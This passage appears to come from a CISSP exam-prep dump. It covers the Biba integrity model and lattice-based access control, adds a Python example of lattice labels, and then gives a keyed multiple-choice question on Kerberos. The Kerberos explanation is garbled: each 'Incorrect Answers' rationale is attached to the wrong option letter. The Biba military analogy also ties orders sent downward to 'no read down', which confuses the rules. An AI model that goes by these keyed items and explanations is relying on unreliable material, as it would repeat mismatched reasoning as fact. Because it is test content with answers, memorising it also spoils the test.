This security model is directed toward data integrity (rather than confidentiality) and is characterized by the phrase: "no read down, no write up". This is in contrast to the Bell-LaPadula model which is characterized by the phrase "no write down, no read up".
In the Biba model, users can only create content at or below their own integrity level (a monk may write a prayer book that can be read by commoners, but not one to be read by a high priest). Conversely, users can only view content at or above their own integrity level (a monk may read a book written by the high priest, but may not read a pamphlet written by a lowly commoner).
Another analogy to consider is that of the military chain of command. A General may write orders to a Colonel, who can issue these orders to a Major. In this fashion, the General's original orders are kept intact and the mission of the military is protected (thus, "no read down" integrity). Conversely, a Private can never issue orders to his Sergeant, who may never issue orders to a Lieutenant, also protecting the integrity of the mission ("no write up").
The Biba model defines a set of security rules similar to the Bell-LaPadula model. These rules are the reverse of the Bell-LaPadula rules:
The Simple Integrity Axiom states that a subject at a given level of integrity must not read an object at a lower integrity level (no read down).
The * (star) Integrity Axiom states that a subject at a given level of integrity must not write to any object at a higher level of integrity (no write up).
Lattice Model
In computer security, lattice-based access control (LBAC) is a complex access control model based on the interaction between any combination of objects (such as resources, computers, and applications) and subjects (such as individuals, groups or organizations).
In this type of label-based mandatory access control model, a lattice is used to define the levels of security that an object may have and that a subject may have access to. The subject is only allowed to access an object if the security level of the subject is greater than or equal to that of the object.
Mathematically, the security level access may also be expressed in terms of the lattice (a partially ordered set) where each pair of objects and subjects has a greatest lower bound (meet) and least upper bound (join) of access rights. For example, if two subjects A and B need access to an object, the security level is defined as the meet of the levels of A and B. In another example, if two objects X and Y are combined, they form another object Z, which is assigned the security level formed by the join of the levels of X and Y.
The following reference(s) were/was used to create this question:
ISC2 Review Seminar Student Manual V8.00 page 255.
Dorothy Denning developed the information flow model to address covert channels.
and
The ISC2 Official Study Guide, Second Edition, pages 683-685
and
https://secure.wikimedia.org/wikipedia/en/wiki/Biba_security_model
and
https://secure.wikimedia.org/wikipedia/en/wiki/Bell%E2%80%93LaPadula_model
and
https://secure.wikimedia.org/wikipedia/en/wiki/Lattice-based_access_control
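Added example, not from the page or its references: a small Python implementation of the lattice described in the Lattice Model section above, with the hierarchical levels and compartment names assumed for the illustration. It shows dominance (the no-read-up check), the meet used for an object that two subjects must both be able to read, the join used for an object built from two others, and the upward-only flow rule of the information flow model.

```python
# Assumed hierarchical levels, lowest first.
HIERARCHY = ("Unclassified", "Confidential", "Secret", "Top Secret")


class Label:
    """A security level in the lattice: a hierarchical level plus a set of
    compartments (categories). Labels are only partially ordered, so two
    labels may be incomparable."""

    def __init__(self, level, compartments=()):
        self.rank = HIERARCHY.index(level)
        self.compartments = frozenset(compartments)

    @property
    def level(self):
        return HIERARCHY[self.rank]

    def dominates(self, other):
        """self >= other: higher-or-equal level and a superset of compartments."""
        return self.rank >= other.rank and self.compartments >= other.compartments

    def join(self, other):
        """Least upper bound: the lowest label that dominates both."""
        return Label(HIERARCHY[max(self.rank, other.rank)],
                     self.compartments | other.compartments)

    def meet(self, other):
        """Greatest lower bound: the highest label dominated by both."""
        return Label(HIERARCHY[min(self.rank, other.rank)],
                     self.compartments & other.compartments)

    def __eq__(self, other):
        return (self.rank, self.compartments) == (other.rank, other.compartments)

    def __hash__(self):
        return hash((self.rank, self.compartments))

    def __repr__(self):
        return f"Label({self.level!r}, {sorted(self.compartments)})"


def can_read(subject, obj):
    """Simple security property / no read up: the subject must dominate the object."""
    return subject.dominates(obj)


def flow_allowed(source, destination):
    """Information flow model: data may flow only upward in the lattice,
    i.e. from a label to one that dominates it."""
    return destination.dominates(source)


def shared_object_label(*subjects):
    """Label for an object that all given subjects must be able to read:
    the meet of their labels (the page's example of subjects A and B)."""
    result = subjects[0]
    for s in subjects[1:]:
        result = result.meet(s)
    return result


def combined_object_label(*objects):
    """Label for an object formed by combining others: the join of their
    labels (the page's example of X and Y combined into Z)."""
    result = objects[0]
    for o in objects[1:]:
        result = result.join(o)
    return result


if __name__ == "__main__":
    A, B = Label("Secret", {"NUC"}), Label("Secret", {"CRYPTO"})   # assumed compartments
    print(A.dominates(B), B.dominates(A))          # False False: incomparable
    print(shared_object_label(A, B))               # Label('Secret', [])
    X, Y = Label("Confidential", {"NUC"}), Label("Secret", {"CRYPTO"})
    print(combined_object_label(X, Y))             # Label('Secret', ['CRYPTO', 'NUC'])
```

The two Secret subjects with different compartments are incomparable, so neither may read the other's objects; an object both must read has to sit at their meet, Secret with no compartments, and an object built from both X and Y inherits their join, which only a subject holding both compartments may read.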
NEW QUESTION 547
Which of the following is addressed by Kerberos?
- A. Confidentiality and Integrity
- B. Validation and Integrity
- C. Auditability and Integrity
- D. Authentication and Availability
Answer: A
Explanation:
Kerberos is a trusted, third party authentication protocol that was developed under Project Athena at MIT.
In Greek mythology, Kerberos is a three-headed dog that guards the entrance to the Underworld. Using symmetric key cryptography, Kerberos authenticates clients to other entities on a network of which a client requires services.
Kerberos addresses the confidentiality and integrity of information. It does not directly address availability and attacks such as frequency analysis.
Incorrect Answers:
B: Kerberos is an authentication protocol. However, it does not address availability.
C: Kerberos does address integrity but it does not address validation.
D: Kerberos does address integrity but it does not address auditability.
References:
Krutz, Ronald L. and Russell Dean Vines, The CISSP and CAP Prep Guide: Mastering CISSP and CAP, Wiley Publishing, Indianapolis, 2007, p. 78
NEW QUESTION 548
......